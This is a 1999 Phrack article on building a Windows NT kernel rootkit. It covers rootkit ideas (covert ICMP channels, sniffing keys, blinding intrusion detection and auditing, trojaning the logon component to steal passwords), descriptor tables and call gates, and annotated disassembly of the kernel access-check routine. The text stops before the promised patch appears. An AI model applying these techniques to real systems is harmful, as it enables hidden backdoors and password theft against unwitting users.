-------[ Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 05 of 19 ] -------------------------[ A *REAL* NT Rootkit, patching the NT Kernel ] --------[ Greg Hoglund <hoglund@ieway.com> ] Introduction ------------ First of all, programs such as Back Orifice and Netbus are NOT rootkits. They are amateur versions of PC-Anywhere, SMS, or a slew of other commercial applications that do the same thing. If you want to remote control a workstation, you could just as easily purchase the incredibly powerful SMS system from Microsoft. A remote-desktop/administration application is NOT a rootkit. What is a rootkit? A rootkit is a set of programs which *PATCH* and *TROJAN* existing execution paths within the system. This process violates the *INTEGRITY* of the TRUSTED COMPUTING BASE (TCB). In other words, a rootkit is something which inserts backdoors into existing programs, and patches or breaks the existing security system. - A rootkit may disable auditing when a certain user is logged on. - A rootkit could allow anyone to log in if a certain "backdoor" password is used. - A rootkit could patch the kernel itself, allowing anyone to run privileged code if they use a special filename. The possibilities are endless, but the point is that the "rootkit" involves itself in pre-existing architecture, so that it goes un-noticed. A remote administration application such as PC Anywhere is exactly that, an application. A rootkit, on the other hand, patches the already existing paths within the target operating system. To illustrate this, I have included in this document a 4-byte patch to the NT kernel that removes ALL security restrictions from objects within the NT domain. If this patch were applied to a running PDC, the entire domain's integrity would be violated. If this patch goes unnoticed for weeks or even months, it would be next to impossible to determine the damage. Network based security & the Windows NT Trust Domain ---------------------------------------------------- If you know much about the NT Kernel, you know that one of the executive components is called the Security Reference Monitor (SRM). The DoD Red Book also defines a "Security Reference Monitor". We are talking the same language. In the Red Book, a security domain is managed by a single entity. To Quote: "A single trusted system is accredited as a single entity by a single accrediting authority. A ``single trusted system'' network implements a reference monitor to enforce the access of subjects to objects in accordance with an explicit and well defined network security policy [DoD Red Book]." In NT parlance, that is called the Primary Domain Controller (PDC). Remember that every system has local security and domain security. In this case, we are talking about the domain security. The PDC's "Security Reference Monitor" is responsible for managing all of the objects within the domain. In doing this, it creates a single point of control, and therefore a "single trusted system" network. How to violate system integrity ------------------------------- I know this is alot of book theory, but bear with me just a bit longer. The DoD Orange Book also defines a "Trusted Computing Base" (TCB). If you are an NT programmer, then you have likely worked with the security privilege SE_TCB_PRIVILEGE. That privilege maps to the more familiar "act as part of the Operating System" User-Right. Using the User Administrator for NT you can actually add this privilege to a user. If you have the ability to act as part of the TCB, you can basically do anything. There is very little security implemented between your process and the rest of the machine. If the TCB can no longer be trusted, then the integrity of the entire network system is shot. The patch I am about to show you is an example of this. The patch, if installed on a Workstation, violates a network "partition". The patch, if installed on a PDC, violates the entire network's integrity. What is a partition? The Red Book breaks the network into NTCB (Network Trusted Computing Base) "Partitions". Any single component or machine on the network may be considered a "partition". This makes it convenient for analysis. To Quote: "An NTCB that is distributed over a number of network components is referred to as partitioned, and that part of the NTCB residing in a given component is referred to as an NTCB partition. A network host may possess a TCB that has previously been evaluated as a stand-alone system. Such a TCB does not necessarily coincide with the NTCB partition in the host, in the sense of having the same security perimeter [DoD Red Book]." On the same host you may have two unique regions, the TCB, which is the traditional Orange Book evaluation for Trusted Computing Base, and the NTCB. These partitions do not have to overlap, but they can. If any component of one is violated, it is likely that the other is as well. In other words, if a host is compromised, the NTCB may also be compromised. Obviously to install a patch over the TCB, you must already be Administrator, or have the ability to install a device driver. Given that Trojans and Virii work so well, it would be very easy to cause this patch to be installed w/o someone's knowledge. Imagine an exploit ------------------ Before I digress into serious techno-garble, consider some of the attacks that are possible by patching the NT kernel. All of these are possible because we have violated the TCB itself: 1. Insert invalid data. Invalid data can be inserted into any network stream. It can also introduce errors into the fixed storage system, perhaps subtly over time, such that even the backups get corrupted. This violates reliability & integrity. 2. Patch incoming ICMP. Using ICMP as a covert channel, the patch can read ICMP packets coming into the kernel for embedded commands. 3. Patch incoming ethernet. It can act as a sniffer, but without all of the driver components. If it has patched the ethernet, then it can also stream data in/out of the network. It can sniff crypto keys. 4. Patch existing DLL's, such as wininet.dll, capturing important data. 5. Patch the IDS system. It can patch a program such as Tripwire or RealSecure to violate its integrity, rendering the program unable to detect the nastiness... 6. Patch the auditing system, i.e., event log, to ignore certain event log messages. Now for the rare steak. Let's delve into an actual kernel patch. If you already understand protected mode and the global descriptor table, then you can skip this next section. Otherwise put on your hiking boots, there are a couple of switchbacks ahead. Rings of Power -------------- Windows NT is unlike DOS or Windows 95 in that it has process-space security. Every user-mode process has an area of memory that is protected by a Security Descriptor. Usually this SD is determined from the Access Token of the user that started the process. Access to all objects is handled through a "Access Control List". For Windows NT, this is called "Discretionary Access Control". Personally I find it really hard to grasp something if I don't understand it's most basic details. So, this next section describes the very foundation that makes security possible on the x86 architecture. First, it is important to understand "protected mode". Protected mode can only be understood by memory addressing. Almost all of the expanded capabilities of the x86 processor are built upon memory addressing. Protected mode gives you access to a 4 GB memory space. Multitasking and privilege levels are all based upon tricks with memory addressing. This discussion only applies to 386 and beyond. Memory is divided into code and data segments. In protected mode, all memory is addressed as a segment + an offset. Conversely, in real mode, everything is interpreted as an actual address. For our discussion, we only care about protected mode. In protected mode things get a little more complicated. We must address first the segment, followed by an offset into that segment. It is sort of a two step process. Why is this interesting?? This is how most modern operating systems work, and it is important for exploits and Virii. Any modern mobile code must be able to work within this arena. What is a selector? A selector is just a fancy word for a memory segment. Memory segments are organized by a table. These table entries are often called descriptors. So, remember, a selector is-a segment is-a descriptor. It's all the same thing. If you understand how the memory segments are kept track of, then you pretty much understand the whole equation. Every memory segment is first a virtual address (16-bits) plus an offset from that address (32-bits). A segment is not an actual address, like in realmode, but the number of a selector it wants to use. A selector is usually a small integer number. This small number is an offset into a table of descriptors. In turn, the descriptor itself then has the actual linear address of the beginning of the memory segment. In addition to that, the descriptor has the access privilege of the memory segment. Descriptors are stored in a table called the Global Descriptor Table (GDT). Each descriptor has a Descriptor Privilege Level (DPL), indicating what ring the memory segment runs in. Suffice it to say, the selector is your vehicle. Under NT and 95, there are selectors which cover the entire 4GB address range. If you were using one of these selectors, you could walk all over the memory map from 0 to whatever. These selectors do exist, and they are protected by a DPL of 0. Under Windows 9x, selector 28 is a ring 0 that covers the entire 4gb region. Under NT, selectors 8 and 10 achieve the same purpose. Dumping the GDT from SoftIce produces a table similar to this: GDTBase=80036000 Limit=0x03FF 0008 Code32 00000000 FFFFFFFF 0 P RE 0010 Data32 00000000 FFFFFFFF 0 P RW 001B Code32 00000000 FFFFFFFF 3 P RE 0023 Data32 00000000 FFFFFFFF 3 P RW 0028 TSS32 8001D000 000020AB 0 P B 0048 Reserved 00000000 00000000 0 NP 0060 Data16 00000400 0000FFFF 3 P RW etc, etc .... You can see what segment you are currently using by checking the CPU registers. The registers SS, DS, and CS indicate which selectors are being used for Stack Segment, Code Segment, and Data Segment. The stack and code segments must be in the same ring. 1. Segments can overlap one another. In other words, more than one segment can represent the same address-space. Segments can overlap one another wholly, or only in part. The address range for a segment is important, of course, but there is other delicious information we care about. For instance, a segment also has a Privilege Level (DPL). ---- ---- | | | | | | | | | | ---- | | ---- | | | | | | | | ---- | | | | ---- What is a DPL? Descriptor Privilege Level. This is important to understand. Every memory segment is protected by a privilege level, often called a "ring". The Intel processor has 4 rings, 0 through 3, usually only ring 0 and 3 are used. Lower ring levels have more privilege. In order to access a memory segment, the caller must have a current privilege level equal to or lower than the one being accessed. Current privilege level is often called CPL, and descriptor privilege level is often called DPL. This type of protection is a requirement for almost any security architecture. In the old days of DOS, mobile code such as virii were able to hook interrupts and execute any code at whim. They were walking all over the memory map at will. No such luck with the advent of Windows NT. There's a gaping need for Windows NT exploits that can take advantage of the old tricks. The central problem is that most code is executing within user mode, and has not access to ring 0, and therefore no access to the Interrupt Descriptor Table or the memory map as a whole. Under NT, the access to ring 0 is controlled from the right to add your own selector to the GDT. When you transition to ring 0, you are still in protected mode and the Virtual Memory Manager is still operating. Lets suppose you have written a virus that patches the Global Descriptor Table (GDT) and adds a new descriptor. This new descriptor describes a memory segment that covers the entire range of the map, from 0 to FFFFFFFF___. The DPL of the descriptor is 0, so any code running from it can access other ring-0 segments. In fact, it can access the entire map. A DPL 0 memory segment marked as "conforming" will violate integrity. The sensitivity label, in this regard, would be the DPL. The fact it is conforming violates the DPL's of other segments, if they overlap. If your descriptor is marked conforming, it can be called freely from ring-3 (user mode). This new entry goes unnoticed, of course. Who monitors the GDT on their system? Most people don't even know what that is. There are few IDS systems that monitor this type of information. Now you have effectively placed a backdoor into the memory map. You could be running under any process token, and have full read/write access to the map. This means reading/writing other important tables, such as the Interrupt Table. This means reading other procii's protected memory. This means infecting other files and procii w/ your virii at whim. Patching the SRM ---------------- The Security Reference Monitor is responsible for enforcing access control. Under NT, all of the SRM functions are handled by ntoskrnl.exe. If the integrity of that code were violated, then the SRM could no longer be trusted. The whole security system has failed. The Security Reference Monitor is responsible for saying Yes/No to any object access. It consults a process table to determine your current running process' access token. It then compares the access token with the required access of the object. Every object has a Security Descriptor (SD). Your running process has an Access Token. Comparing these two structures, the SRM is able to deny or allow you access to the object. orange book: "In October of 1972, the Computer Security Technology Planning Study, conducted by James P. Anderson & Co., produced a report for the Electronic Systems Division (ESD) of the United States Air Force.[1] In that report, the concept of "a reference monitor which enforces the authorized access relationships between subjects and objects of a system" was introduced. The reference monitor concept was found to be an essential element of any system that would provide multilevel secure computing facilities and controls." It then listed the three design requirements that must be met by a reference validation mechanism: a. The reference validation mechanism must be tamper proof. b. The reference validation mechanism must always be invoked. c. The reference validation mechanism must be small enough to be subject to analysis and tests, the completeness of which can be assured."[1] The SRM is *NOT* tamper proof. It may be protected by the TCB security privilege, but I suggest that the only truly tamper-proof SRM is going to use cryptographic mechanisms. Using an attack vector such as Virii or Trojan's, a patch could easily be placed within the TCB. You can patch the SRM itself if you have access to the map. In this, you can insert a backdoor such that a certain user-id ALWYAS has access. However, this does not require you to edit the user's security level in any way. You are patching it at the access point, not the source. So, auditing programs will not be able to notice the problem. This is a simple trick that could be employed in any NT RootKit. There are several key components to the NT Kernel. They are sometimes referred to as the "NT Executive". The NT executive is really a group of individual components with a well defined interface. Each component has such a well defined interface, in fact, that you could actually take it out completely and replace it with a new one. As long as the new component implemented all of the same interfaces, then the system would continue to function. The following are all components of the NT Executive: HAL: Hardware Abstraction Layer, HAL.DLL NTOSKERNL: Contains several components, NTOSKRNL.EXE The Virtual Memory Manager (VMM) The Security Reference Monitor (SRM) The I/O Manager The Object Manager The Process and Thread Manager The Kernel Services themselves -(Exception handling and runtime library) LPC Manager (Local Procedure Call) Hey, these are some of the modules listed when a Blue Screen occurs! The system is just a big memory map! With all of this data we are bound to find structures of interest! Many key data structures are crucial to security. Once we know what we are looking for, we can get into SoftIce and start poking around. A list of the exported functions for some of these components is in Appendix A. Using a tool such as SoftIce, reverse engineering the SRM and other components is easy ;) The methodology is simple. First, we must find the component we are interested in. They all sit in system memory at some point... Some key data structures are: ACL (Access Control List), contains ACE's ACE (Access Control Entry), has a 32-bit Access Mask and a SID SID (Security Identifier), a big number PTE (Page Table Entry) SD (Security Descriptor), has an Owner SID, a Group SID, and an ACL AT (Access Token) Now for some tricks! The first thing we need to do is identify which of these data structures we will be using. If we want to reverse engineer the Security Reference Monitor, then we can be assured that our SID is going to be used in some call somewhere.. This is where SoftIce comes in. SoftIce has an incredible feature called expressions. SoftIce will let you define a regular expression to be evaluated for a breakpoint. In other words, I can tell SoftIce to break if only a special set of circumstances has occurred. So, for example (working implementation): 1. I want softice to break if the ESI register references my SID. Since a SID is many words long, I will have to define the expression in several portions: bpx (ESI->0 == 0x12345678) && (ESI->4 == 0x90123456) && (ESI->8 == 0x78901234) What I have done here is tell softice to break if the ESI register points to the data: 0x123456789012345678901234. Notice how I use the -> operator to offset ESI for each word. Now, try to access an object. SoftIce will promptly break when your SID is used in a call. There are many system components that are worth reverse engineering. You may also want to play with the following: 1. GINA, (GINA.DLL) The logon screen you see when you type your password. Imagine if this component was trojaned.. A Virii could capture passwords across the enterprise. 2. LSA (The Local System Authority) This is the module responsible for querying the SAM database. This would be an ideal place to put a rootkit-password that *ALWAYS* allows you access to the system. 3. SSDT, The System Service Descriptor Table 4. GDT, the Global Descriptor Table 5. IDT, the Interrupt Descriptor Table Getting to ring zero in the first place --------------------------------------- User mode is very limiting under NT. Your process is bound by the selector it is currently using. The process cannot simply waltz over the entire memory map. As we have discussed, the process must first load a selector. You cannot simply read memory from 0 to FFF_, you can only access your own memory segment. There are tricks however. If the process is running under a user token that has "add service" privilege, then you can create your own call gate, install it in realtime, and then use it to run your code ring 0. Once you are running ring 0 you can patch the IDT or the Kernel. This is how User-Mode normally accesses a Ring-0 Code Segment. If you don't want to go to this trouble, you can upload a byte patcher that runs in ring zero on boot. This is as simple as writing a driver and installing to run on the next reboot. However, installing your own call-gate is by far the most sexy. Lets talk sexy. The answer is a call gate. All of the functions provided by NTDLL.DLL are implemented this way. This is why you must call Int 2Eh to make a call. The entire set of Int 2Eh functions are known as the Native Call Interface (NCI). What really happens is the Int 2Eh is handled by a function in NTOSKRNL.EXE. This function is called KiSystemService(). KiSystemService() routes the call to the proper code location. When you make a system call, you must first load the index of the function you wish to call. This is loaded into register EAX. Next, if the call takes parameters, a pointer to this block is loaded into EDX. Interrupt 2Eh is called, and EAX holds the return value. This is old hat to most assembler programmers. What is not obvious is how this is implemented in the Kernel. The function KiSystemService() is called, and left with the responsibility for dispatching the call. KiSystemService() must first determine *WHAT* function to call next, based on what we put in EAX. So, to this end, it maintains a table of functions and their index numbers.. imagine that! SofIce will dump this table if your interested. It looks something like: :ntcall Service table address: 80149398 Number of services:000000D4 0000 0008:8017451E params=06 ntoskrnl!NtConnectPort+0834 0001 0008:80199C16 params=08 ntoskrnl!SeQueryAuthenticationIdToken+04B8 0002 0008:8019B3A2 params=0B ntoskrnl!SePrivilegeObjectAuditAlarm+02B0 0003 0008:80158E50 params=02 ntoskrnl!NtAddAtom 0004 0008:80197624 params=06 ntoskrnl!NtAdjustPrivilegesToken+0422 0005 0008:80197202 params=06 ntoskrnl!NtAdjustPrivilegesToken 0006 0008:80196256 params=02 ntoskrnl!PsGetProcessExitTime+1848 0007 0008:8019620E params=01 ntoskrnl!PsGetProcessExitTime+1800 0008 0008:8015901E params=01 ntoskrnl!NtAllocateLocallyUniqueId 0009 0008:801592EC params=03 ntoskrnl!NtAllocateUuids 000A 0008:8017B0F6 params=06 ntoskrnl!NtAllocateVirtualMemory 000B 0008:8011B8E4 params=03 ntoskrnl!ZwYieldExecution+08AC etc etc... Well, this is all very interesting, but where is this table stored? How does SoftIce manage to read it? Of course, it's all undocumented ;-) Here I have no one to thank more than my friend from Sri Lanka, a fellow Rhino9 member, who goes by the handle Joey__. His paper on extending the NCI is nothing less than mind-blowing. I draw heavily upon his research for this section. I feel this paper could not be complete without going over call-gates and the NCI, so I paraphrase some of his work. For more detailed information on adding your own system services, read his paper entitled "Adding New Services to the NT Kernel Native API". A very interesting thing happens when you boot NT. You start with about 200 functions in the NCI. These are all implemented in NTOSKRNL.EXE. But, soon afterwards, another 500 or so functions are added to the NCI, these being implemented in WIN32K.SYS. The fact that additional functions were added proves that it is possible to register new functions into the NCI during runtime. The table that SoftIce dumps when you type NTCALL is called the System Service Descriptor Table (SSDT). The SSDT is what the KiSystemService() function uses to look up the proper function for a Int 2Eh call. Given that the NCI is extensible, it must be possible to add new functions to this table. As it turns out, there are actually multiple tables. WIN32K.SYS doesn't actually add to the EXISTING system table, but creates a whole NEW one with 500 or so functions, and then ADDS it to the Kernel. To do this, it calls the exported function KeAddSystemServiceTable(). So, in a nutshell, all we have to do is create a new table with OUR functions and do the same thing. Another angle on this involves adding our functions to the existing NCI table. But, this involves patching memory. Again, that's what we do best. To pull this trick off cleanly, we must allocate new memory large enough to hold the old tables plus our additional entries. We then must copy the old tables into our new memory, add our entries, and then patch memory so that KiSystemService() looks at our new table. The FOUR-Byte Patch ------------------- Okay, lesson number one. Don't make yourself do extra work when you don't have to. This is the story of my life. I started this project by reversing the RtlXXX subroutines. For instance, there is a routine called RtlGetOwnerSecurityDescriptor(). This is a simple utility function that returns the Owner SID for a given security descriptor. I patched this routine to check for the BUILTIN\Administrators group, and alter it to be the BUILTIN\Users group. Although this patch works, it doesn't help me obtain access to protected files and shares. The RTL routine is only called for Process and Thread creation, it would seem. So, to make a long story short, I have included the RTLXXX information and patch below. It will illustrate a working kernel patch and should help you see my thought process as I 0wned a key kernel function. Okay, lesson number two. If at first you don't succeed, try another function. This time I got very wise and decided to test a number of breakpoints in the Kernel before doing any extra work. Because I wanted to circumvent access to a file directly, I moved directly onward to the SeAccessCheck() function. Up front, I set a breakpoint on this function to make sure it is being called when accessing a file. To my excitement, it appears this function is called for almost any object access, not just a file. This means network shares as well. Going further, I tested my next patch against network share access as well as file access. I created a test directory, shared it over the network, and created a test file within that directory. At first, the file had the default Everyone FULL CONTROL permissions. I set a breakpoint on SeAccessCheck() and attempted to cat the file. For this simple command the function is called three times: Break due to BPX ntoskrnl!SeAccessCheck (ET=2.01 seconds) :stack Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711D1C) => ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD711734) Break due to BPX ntoskrnl!SeAccessCheck (ET=991.32 microseconds) :stack Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711CB8) => ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD7116D8) Break due to BPX ntoskrnl!SeAccessCheck (ET=637.15 microseconds) :stack Ntfs!PAGE+B683 at 0008:8020C203 (SS:EBP 0010:FD711D08) => ntoskrnl!SeAccessCheck at 0008:8019A0E6 (SS:EBP 0010:FD711720) Next I set the file access to Administrator NO ACCESS. Attempting to cat the file locally resulted in an "Access Denied" message. The routine is called 13 times before the Access Denied message is given. Now I try to access it over the network. The function is called a total of 18 times before a Access Denied message is given. It would seem it takes alot more work to deny access than it does to give it. ;) I was lit now, it looked like I had my target. After another 2 shots of espresso, I dumped the IDA file for SeAccessCheck, busted into SoftIce and started exploring: To make things simpler, I have removed some of the assembly code that is not part of my discussion. If you are going to start playing with this, then you should disassemble all of this yourself nonetheless. I recommend IDA. At first I tried WDAsm32, but it was unable to decompile the ntoskrnl.exe binary properly. IDA, on the other hand, had no problems. WDAsm32 has a much nicer GUI interface, but IDA has proved more reliable. Just as most engineers, I use many tools to get the job done, so I recommend having both disassemblers around. The function & patches: 8019A0E6 ; Exported entry 816. SeAccessCheck 8019A0E6 8019A0E6 ; =========================================================================== 8019A0E6 8019A0E6 ; S u b r o u t i n e 8019A0E6 ; Attributes: bp-based frame 8019A0E6 8019A0E6 public SeAccessCheck 8019A0E6 SeAccessCheck proc near 8019A0E6 ; sub_80133D06+B0p ... 8019A0E6 8019A0E6 arg_0 = dword ptr 8 ; appears to point to a ; Security Descriptor 8019A0E6 arg_4 = dword ptr 0Ch 8019A0E6 arg_8 = byte ptr 10h 8019A0E6 arg_C = dword ptr 14h 8019A0E6 arg_10 = dword ptr 18h 8019A0E6 arg_14 = dword ptr 1Ch 8019A0E6 arg_18 = dword ptr 20h 8019A0E6 arg_1C = dword ptr 24h 8019A0E6 arg_20 = dword ptr 28h 8019A0E6 arg_24 = dword ptr 2Ch 8019A0E6 8019A0E6 push ebp 8019A0E7 mov ebp, esp 8019A0E9 push ebx 8019A0EA push esi 8019A0EB push edi 8019A0EC cmp byte ptr [ebp+arg_1C], 0 8019A0F0 mov ebx, [ebp+arg_C] 8019A0F3 jnz short loc_8019A137 8019A0F5 test ebx, 2000000h 8019A0FB jz short loc_8019A11D 8019A0FD mov eax, [ebp+arg_18] 8019A100 mov edi, [ebp+arg_20] 8019A103 mov ecx, ebx 8019A105 mov eax, [eax+0Ch] 8019A108 and ecx, 0FDFFFFFFh 8019A10E mov [edi], eax 8019A110 or ecx, eax 8019A112 mov eax, [ebp+arg_10] 8019A115 or eax, ecx 8019A117 mov [edi], ecx 8019A119 mov [edi], eax 8019A11B jmp short loc_8019A13A 8019A11D ; =========================================================================== 8019A11D 8019A11D loc_8019A11D: ; CODE XREF: SeAccessCheck+15 8019A11D mov eax, [ebp+arg_10] 8019A120 mov edi, [ebp+arg_20] 8019A123 or eax, ebx 8019A125 mov edx, [ebp+arg_24] 8019A128 mov [edi], eax 8019A12A mov al, 1 8019A12C mov dword ptr [edx], 0 8019A132 jmp loc_8019A23A 8019A137 ; =========================================================================== 8019A137 8019A137 loc_8019A137: ; CODE XREF: SeAccessCheck+D 8019A137 mov edi, [ebp+arg_20] 8019A13A 8019A13A loc_8019A13A: ; CODE XREF: SeAccessCheck+35 8019A13A cmp [ebp+arg_0], 0 8019A13E jnz short loc_8019A150 8019A140 mov edx, [ebp+arg_24] 8019A143 xor al, al ; STATUS_ACCESS_DENIED not hit ; under normal means 8019A145 mov dword ptr [edx], 0C0000022h 8019A14B jmp loc_8019A23A 8019A150 ; =========================================================================== 8019A150 8019A150 loc_8019A150: ; CODE XREF: SeAccessCheck+58 8019A150 mov esi, [ebp+arg_4] 8019A153 cmp dword ptr [esi], 0 8019A156 jz short loc_8019A16E 8019A158 cmp dword ptr [esi+4], 2 8019A15C jge short loc_8019A16E 8019A15E mov edx, [ebp+arg_24] 8019A161 xor al, al ; STATUS_BAD_IMPERSONATION_LEVEL ; not normally hit 8019A163 mov dword ptr [edx], 0C00000A5h 8019A169 jmp loc_8019A23A 8019A16E ; =========================================================================== 8019A16E 8019A16E loc_8019A16E: ; CODE XREF: SeAccessCheck+70 8019A16E ; SeAccessCheck+76 8019A16E test ebx, ebx 8019A170 jnz short loc_8019A1A0 8019A172 cmp [ebp+arg_10], 0 8019A176 jnz short loc_8019A188 8019A178 mov edx, [ebp+arg_24] 8019A17B xor al, al ; STATUS_ACCESS_DENIED not ; normally hit 8019A17D mov dword ptr [edx], 0C0000022h 8019A183 jmp loc_8019A23A 8019A188 ; =========================================================================== 8019A188 8019A188 loc_8019A188: ; CODE XREF: SeAccessCheck+90 8019A188 mov eax, [ebp+arg_10] 8019A18B xor ecx, ecx 8019A18D mov edx, [ebp+arg_24] 8019A190 mov [edi], eax 8019A192 mov eax, [ebp+arg_14] 8019A195 mov [edx], ecx 8019A197 mov [eax], ecx 8019A199 mov al, 1 8019A19B jmp loc_8019A23A 8019A1A0 ; =========================================================================== 8019A1A0 8019A1A0 loc_8019A1A0: ; CODE XREF: SeAccessCheck+8A 8019A1A0 cmp [ebp+arg_8], 0 8019A1A4 jnz short loc_8019A1AC 8019A1A6 push esi 8019A1A7 call SeLockSubjectContext 8019A1AC 8019A1AC loc_8019A1AC: ; CODE XREF: SeAccessCheck+BE 8019A1AC test ebx, 2060000h 8019A1B2 jz short loc_8019A1EA 8019A1B4 mov eax, [esi] 8019A1B6 test eax, eax 8019A1B8 jnz short loc_8019A1BD 8019A1BA mov eax, [esi+8] 8019A1BD 8019A1BD loc_8019A1BD: ; CODE XREF: SeAccessCheck+D2 8019A1BD push 1 8019A1BF push [ebp+arg_0] 8019A1C2 push eax 8019A1C3 call sub_8019A376 8019A1C8 test al, al 8019A1CA jz short loc_8019A1EA 8019A1CC test ebx, 2000000h 8019A1D2 jz short loc_8019A1DA 8019A1D4 or byte ptr [ebp+arg_10+2], 6 8019A1D8 jmp short loc_8019A1E4 8019A1DA ; =========================================================================== 8019A1DA 8019A1DA loc_8019A1DA: ; CODE XREF: SeAccessCheck+EC 8019A1DA mov eax, ebx 8019A1DC and eax, 60000h 8019A1E1 or [ebp+arg_10], eax 8019A1E4 8019A1E4 loc_8019A1E4: ; CODE XREF: SeAccessCheck+F2 8019A1E4 and ebx, 0FFF9FFFFh 8019A1EA 8019A1EA loc_8019A1EA: ; CODE XREF: SeAccessCheck+CC 8019A1EA ; SeAccessCheck+E4 8019A1EA test ebx, ebx 8019A1EC jnz short loc_8019A20C 8019A1EE cmp [ebp+arg_8], 0 8019A1F2 jnz short loc_8019A1FA 8019A1F4 push esi 8019A1F5 call SeUnlockSubjectContext 8019A1FA 8019A1FA loc_8019A1FA: ; CODE XREF: SeAccessCheck+10 8019A1FA mov eax, [ebp+arg_10] 8019A1FD mov edx, [ebp+arg_24] 8019A200 mov [edi], eax 8019A202 mov al, 1 8019A204 mov dword ptr [edx], 0 8019A20A jmp short loc_8019A23A 8019A20C ; =========================================================================== Since most of the arguments are being passed to this, it looks like this routine is a wrapper for this other one.. lets delve deeper.... 8019A20C 8019A20C loc_8019A20C: ; CODE XREF: SeAccessCheck+106 8019A20C push [ebp+arg_24] 8019A20F push [ebp+arg_14] 8019A212 push edi 8019A213 push [ebp+arg_1C] 8019A216 push [ebp+arg_10] 8019A219 push [ebp+arg_18] 8019A21C push ebx 8019A21D push dword ptr [esi] 8019A21F push dword ptr [esi+8] 8019A222 push [ebp+arg_0] 8019A225 call sub_80199836 ; decompiled below *** 8019A22A cmp [ebp+arg_8], 0 8019A22E mov bl, al 8019A230 jnz short loc_8019A238 8019A232 push esi 8019A233 call SeUnlockSubjectContext ; not usually hit 8019A238 8019A238 loc_8019A238: ; CODE XREF: SeAccessCheck+14A 8019A238 mov al, bl 8019A23A 8019A23A loc_8019A23A: ; CODE XREF: SeAccessCheck+4C 8019A23A ; SeAccessCheck+65 ... 8019A23A pop edi 8019A23B pop esi 8019A23C pop ebx 8019A23D pop ebp 8019A23E retn 28h 8019A23E SeAccessCheck endp Subroutine called from SeAccessCheck. Looks like most of work is being done in here. I will try to patch this routine. 80199836 ; ============================================================================== 80199836 80199836 ; S u b r o u t i n e 80199836 ; Attributes: bp-based frame 80199836 80199836 sub_80199836 proc near ; CODE XREF: PAGE:80199FFA 80199836 ; SeAccessCheck+13F ... 80199836 80199836 var_14 = dword ptr -14h 80199836 var_10 = dword ptr -10h 80199836 var_C = dword ptr -0Ch 80199836 var_8 = dword ptr -8 80199836 var_2 = byte ptr -2 80199836 arg_0 = dword ptr 8 80199836 arg_4 = dword ptr 0Ch 80199836 arg_8 = dword ptr 10h 80199836 arg_C = dword ptr 14h 80199836 arg_10 = dword ptr 18h 80199836 arg_16 = byte ptr 1Eh 80199836 arg_17 = byte ptr 1Fh 80199836 arg_18 = dword ptr 20h 80199836 arg_1C = dword ptr 24h 80199836 arg_20 = dword ptr 28h 80199836 arg_24 = dword ptr 2Ch 80199836 80199836 push ebp 80199837 mov ebp, esp 80199839 sub esp, 14h 8019983C push ebx 8019983D push esi 8019983E push edi 8019983F xor ebx, ebx 80199841 mov eax, [ebp+arg_8] ; pulls eax 80199844 mov [ebp+var_14], ebx ; ebx is zero, looks ; like it init's a ; bunch of local vars 80199847 mov [ebp+var_C], ebx 8019984A mov [ebp-1], bl 8019984D mov [ebp+var_2], bl 80199850 cmp eax, ebx ; check that arg8 is ; NULL 80199852 jnz short loc_80199857 80199854 mov eax, [ebp+arg_4] ; arg4 pts to ; "USER32 " 80199857 80199857 loc_80199857: 80199857 mov edi, [ebp+arg_C] ; checking some flags ; off of this one 8019985A mov [ebp+var_8], eax ; var_8 = arg_4 8019985D test edi, 1000000h ; obviously flags.. ; desired access mask ; I think... 80199863 jz short loc_801998CA ; normally this jumps.. ; go ahead and jump 80199865 push [ebp+arg_18] 80199868 push [ebp+var_8] 8019986B push dword_8014EE94 80199871 push dword_8014EE90 80199877 call sub_8019ADE0 ; another undoc'd sub 8019987C test al, al ; return code 8019987E jnz short loc_80199890 80199880 mov ecx, [ebp+arg_24] 80199883 xor al, al 80199885 mov dword ptr [ecx], 0C0000061h 8019988B jmp loc_80199C0C 80199890 ; =========================================================================== removed source here 801998CA ; =========================================================================== 801998CA 801998CA loc_801998CA: ; jump from above lands here 801998CA ; sub_80199836 801998CA mov eax, [ebp+arg_0] ; arg0 pts to a ; Security Descriptor 801998CD mov dx, [eax+2] ; offset 2 is that ; 80 04 number... 801998D1 mov cx, dx 801998D4 and cx, 4 ; 80 04 become 00 04 801998D8 jz short loc_801998EA ; normally doesnt jump 801998DA mov esi, [eax+10h] ; SD[10h] is an offset ; value to the DACL in ; the SD 801998DD test esi, esi ; make sure it exists 801998DF jz short loc_801998EA 801998E1 test dh, 80h 801998E4 jz short loc_801998EC 801998E6 add esi, eax ; FFWDS to first DACL ; in SD ****** 801998E8 jmp short loc_801998EC ; normally all good ; here, go ahead and ; jump 801998EA ; =========================================================================== 801998EA 801998EA loc_801998EA: ; CODE XREF: sub_80199836+A2 801998EA ; sub_80199836+A9 801998EA xor esi, esi 801998EC 801998EC loc_801998EC: ; CODE XREF: sub_80199836+AE 801998EC ; sub_80199836+B2 801998EC cmp cx, 4 ; jump lands here 801998F0 jnz loc_80199BC6 801998F6 test esi, esi 801998F8 jz loc_80199BC6 801998FE test edi, 80000h ; we normally dont match this, ; so go ahead and jump 80199904 jz short loc_8019995E *** removed source here *** 8019995E ; =========================================================================== 8019995E 8019995E loc_8019995E: ; CODE XREF: sub_80199836+CE 8019995E ; sub_80199836+D4 ... 8019995E movzx eax, word ptr [esi+4] ; jump lands 80199962 mov [ebp+var_10], eax ; offset 4 is number of ; ACE's present in DACL ; var_10 = # Ace's 80199965 xor eax, eax 80199967 cmp [ebp+var_10], eax 8019996A jnz short loc_801999B7 ; normally jump *** removed source here *** 801999A2 ; =========================================================================== *** removed source here *** 801999B7 ; =========================================================================== 801999B7 801999B7 loc_801999B7: ; CODE XREF: sub_80199836+134 801999B7 test byte ptr [ebp+arg_C+3], 2 ; looks like part of ; the flags data, ; we usually jump 801999BB jz loc_80199AD3 *** removed source here *** 80199AD3 ; =========================================================================== 80199AD3 80199AD3 loc_80199AD3: ; CODE XREF: sub_80199836+185 80199AD3 mov [ebp+var_C], 0 ; jump lands here 80199ADA add esi, 8 80199ADD cmp [ebp+var_10], 0 ; is number of ACE's zero? 80199AE1 jz loc_80199B79 ; normally not 80199AE7 80199AE7 loc_80199AE7: ; CODE XREF: sub_80199836+33D 80199AE7 test edi, edi ; the EDI register is very ; important we will continue ; to loop back 